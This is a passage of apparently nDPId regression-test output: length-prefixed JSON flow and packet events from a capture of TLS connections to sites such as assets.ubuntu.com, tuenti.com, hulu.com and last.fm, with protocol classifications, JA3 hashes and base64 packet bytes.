AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":361,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482772264,"flow_last_seen":1646482772294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482772294,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00942{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"sites.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482772264,"flow_last_seen":1646482772325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482772325,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"185.125.190.21","src_port":42884,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.UbuntuONE","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.3","client_requested_server_name":"assets.ubuntu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482785304,"flow_last_seen":1646482785304,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482785304,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1646482785304,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785304,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8c2NAAEAG\/FHAqAGAX4OpW8gwAbszoGaBAAAAAKAC+vB9ogAAAgQFtAQCCArCJt4xAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1646482785347,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482785347,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADIGfbVfg6lbwKgBgAG7yDD0fDnYM6BmgqASOJCOBAAAAgQFtAQCCAoi\/WCZwibeMQEDAwk="} -01167{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1646482785351,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482785351,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5c2VAAEAG+lLAqAGAX4OpW8gwAbszoGaC9Hw52YAYAfYZoQAAAQEICsIm3l8i\/WCZFgMBAgABAAH8AwNK0euZMFtaCNBtu+eL8QS+C1QwW1wzikaweB9ZeLN7jCCkdWD5KYTe5rYj3sVQQUUDDmKS7Ul8Bkz8dJPsZBeSHgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAPAA0AAAp0dWVudGkuY29tABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIJK5tprzoOfSjZ23KXMf08y5udMKZfRYOXHDalLyYQBZABcAQQRLZU+TiBidby\/7mJhjeaCEAZfIl\/ESg4w9XgdOmdSs6KJ9\/6C1zE6e09432pgZPLx5qZNVUeHl8Lum72bGeXBPACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00875{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":365,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482785304,"flow_last_seen":1646482785351,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482785351,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"sites.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482785304,"flow_last_seen":1646482785395,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482785395,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.169.91","src_port":51248,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482786097,"flow_last_seen":1646482786097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482786097,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1646482786097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786097,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8MYNAAEAGPTLAqAGAX4OqW5mGAbs4G85LAAAAAKAC+vAJ+AAAAgQFtAQCCApUK4E8AAAAAAEDAwc="} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1646482786139,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482786139,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADEGfbVfg6pbwKgBgAG7mYaAJv+vOBvOTKASOJA3NAAAAgQFtAQCCAojEPIqVCuBPAEDAwk="} -01170{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1646482786140,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482786140,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5MYVAAEAGOzPAqAGAX4OqW5mGAbs4G85MgCb\/sIAYAfY7ugAAAQEIClQrgWcjEPIqFgMBAgABAAH8AwPCuINo9aszS1NOKEJoT\/qcXc1z2+SkMYjVWEN9Dzm1uCAc1Fe\/tF+S3TB+puhQn5k1kl\/SrZE1Zu7DG17b6iPYkAAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAAWABQAABFzdGF0aWMudHVlbnRpLmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACAO0kbEPJvFV01Owk3nxVpBPAsVRMhGqyVHONxZeCXXCAAXAEEEdYt+qtkVgPe4ucZXkNkiZFAQTN50kMr6BFmQ8vGiT4E\/aWy5wxXrEUez6C+lutJauRk\/zdA9y71YXWyeYxHbNwArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00896{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":373,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482786097,"flow_last_seen":1646482786140,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482786140,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00952{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":374,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01214{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":376,"source":"sites.pcapng","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1646482786097,"flow_last_seen":1646482786188,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3831,"flow_avg_l4_payload_len":638,"midstream":0,"thread_ts_msec":1646482786188,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.131.170.91","src_port":39302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tuenti","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"static.tuenti.com","server_names":"*.tuenti.com,tuenti.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"61be9ce3d068c08ff99a857f62352f9d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1","subjectDN":"C=ES, L=Madrid, O=Tuenti Technologies S.L., CN=*.tuenti.com","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"89:B8:FA:C7:22:04:D2:BE:C5:6E:59:10:31:67:42:B1:3F:6D:F8:3B"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482791144,"flow_last_seen":1646482791144,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482791144,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":379,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1646482791144,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791144,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8FF5AAEAGQPrAqAGAX2XD1sjoAbs9AWSXAAAAAKAC+vBfJgAAAgQFtAQCCAoz72hZAAAAAAEDAwc="} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":380,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1646482791167,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482791167,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA8AABAADMGYlhfZcPWwKgBgAG7yOhRyYQJPQFkmKAS\/ohadwAAAgQFtAQCCAoA0SpiM+9oWQEDAwc="} -01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1646482791170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482791170,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5FGBAAEAGPvvAqAGAX2XD1sjoAbs9AWSYUcmECoAYAfYkYQAAAQEICjPvaHMA0SpiFgMBAgABAAH8AwPkjLny33P+mExr32cMRl62\/8RJSZlKid1V05U+ySIWLCA+yoN1VMfFXakU81pmrArAv4PMFa74gV6zhhtZIkRahgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAANAAsAAAhodWx1LmNvbQAXAAD\/AQABAAAKAA4ADAAdABcAGAAZAQABAQALAAIBAAAjAAAAEAAOAAwCaDIIaHR0cC8xLjEABQAFAQAAAAAAIgAKAAgEAwUDBgMCAwAzAGsAaQAdACATY1QXYS0qh7KvKliQF74PNyaFCqlZEZicpu9ccKADKQAXAEEEtcC0kqJMuUk4fNE8PcFvshva3wSMZbKQk5Gr6YxJX1t14RCVX0X4nJLqvHYB8ofAk7LBbtBWK6qUGB5XQIzcOQArAAUEAwQDAwANABgAFgQDBQMGAwgECAUIBgQBBQEGAQIDAgEALQACAQEAHAACQAEAFQCOAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":381,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482791144,"flow_last_seen":1646482791170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482791170,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00925{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":382,"source":"sites.pcapng","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482791144,"flow_last_seen":1646482791191,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":491,"midstream":0,"thread_ts_msec":1646482791191,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"95.101.195.214","src_port":51432,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Hulu","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"hulu.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482801387,"flow_last_seen":1646482801387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482801387,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"34.96.123.111","src_port":44954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":383,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1646482801387,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801387,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8u7RAAEAGHxDAqAGAImB7b6+aAFDTrORQAAAAAKAC+vAeUwAAAgQFtAQCCAqmtsAlAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":384,"source":"sites.pcapng","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1646482801394,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482801394,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8tJQAAHkGLLAiYHtvwKgBgABQr5rfpgWE06zkUaAS\/\/9QBgAAAgQFlgQCCArcngeAprbAJQEDAwg="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":385,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1646482802720,"flow_last_seen":1646482802720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1646482802720,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":385,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1646482802720,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802720,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAA8g6pAAEAGYJjAqAGAI8lwiLgSAbvaEoGzAAAAAKAC+vAuRQAAAgQFtAQCCArAZPJXAAAAAAEDAwc="} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1646482802726,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1646482802726,"pkt":"PKn0qB\/spJGxgjQ5CABFgAA8b+kAAHkGetkjyXCIwKgBgAG7uBJNy0p52hKBtKAS\/\/9IWQAAAgQFlgQCCArHroD1wGTyVwEDAwg="} -01169{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1646482802732,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":583,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":583,"pkt_l4_len":549,"thread_ts_msec":1646482802732,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAI5g6xAAEAGXpnAqAGAI8lwiLgSAbvaEoG0TctKeoAYAfa\/ZwAAAQEICsBk8mLHroD1FgMBAgABAAH8AwM6s1cKgDvTG3LALyk7fAmvRJX9DNZN37XWMNl1\/SdHaCCUR56oKGM2UcODstsWkptKjiMgLAJPLuO56cI3NFuiCgAiEwETAxMCwCvAL8ypzKjALMAwwArACcATwBQAnACdAC8ANQEAAZEAAAASABAAAA1rZXJ2ZS5sYXN0LmZtABcAAP8BAAEAAAoADgAMAB0AFwAYABkBAAEBAAsAAgEAACMAAAAQAA4ADAJoMghodHRwLzEuMQAFAAUBAAAAAAAiAAoACAQDBQMGAwIDADMAawBpAB0AIEXwFTh8NFdQPbVwjRz3qZyMML4Z+FJITLECgKzAH2YhABcAQQROHWQ9TZ\/FNyVoueylOLPpt31B2wF8YuKZg+41\/WG\/Ucaum9xuzZgJXugnVJqsHgtbN0plSfDPGhyRi1GNW\/CAACsABQQDBAMDAA0AGAAWBAMFAwYDCAQIBQgGBAEFAQYBAgMCAQAtAAIBAQAcAAJAAQAVAIkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":387,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1646482802720,"flow_last_seen":1646482802732,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1646482802732,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": {"version":"TLSv1.2","client_requested_server_name":"kerve.last.fm","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00928{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":388,"source":"sites.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1646482802720,"flow_last_seen":1646482802742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1935,"flow_avg_l4_payload_len":483,"midstream":0,"thread_ts_msec":1646482802742,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"35.201.112.136","src_port":47122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.LastFM","breed":"Fun","category":"Music"},"tls": 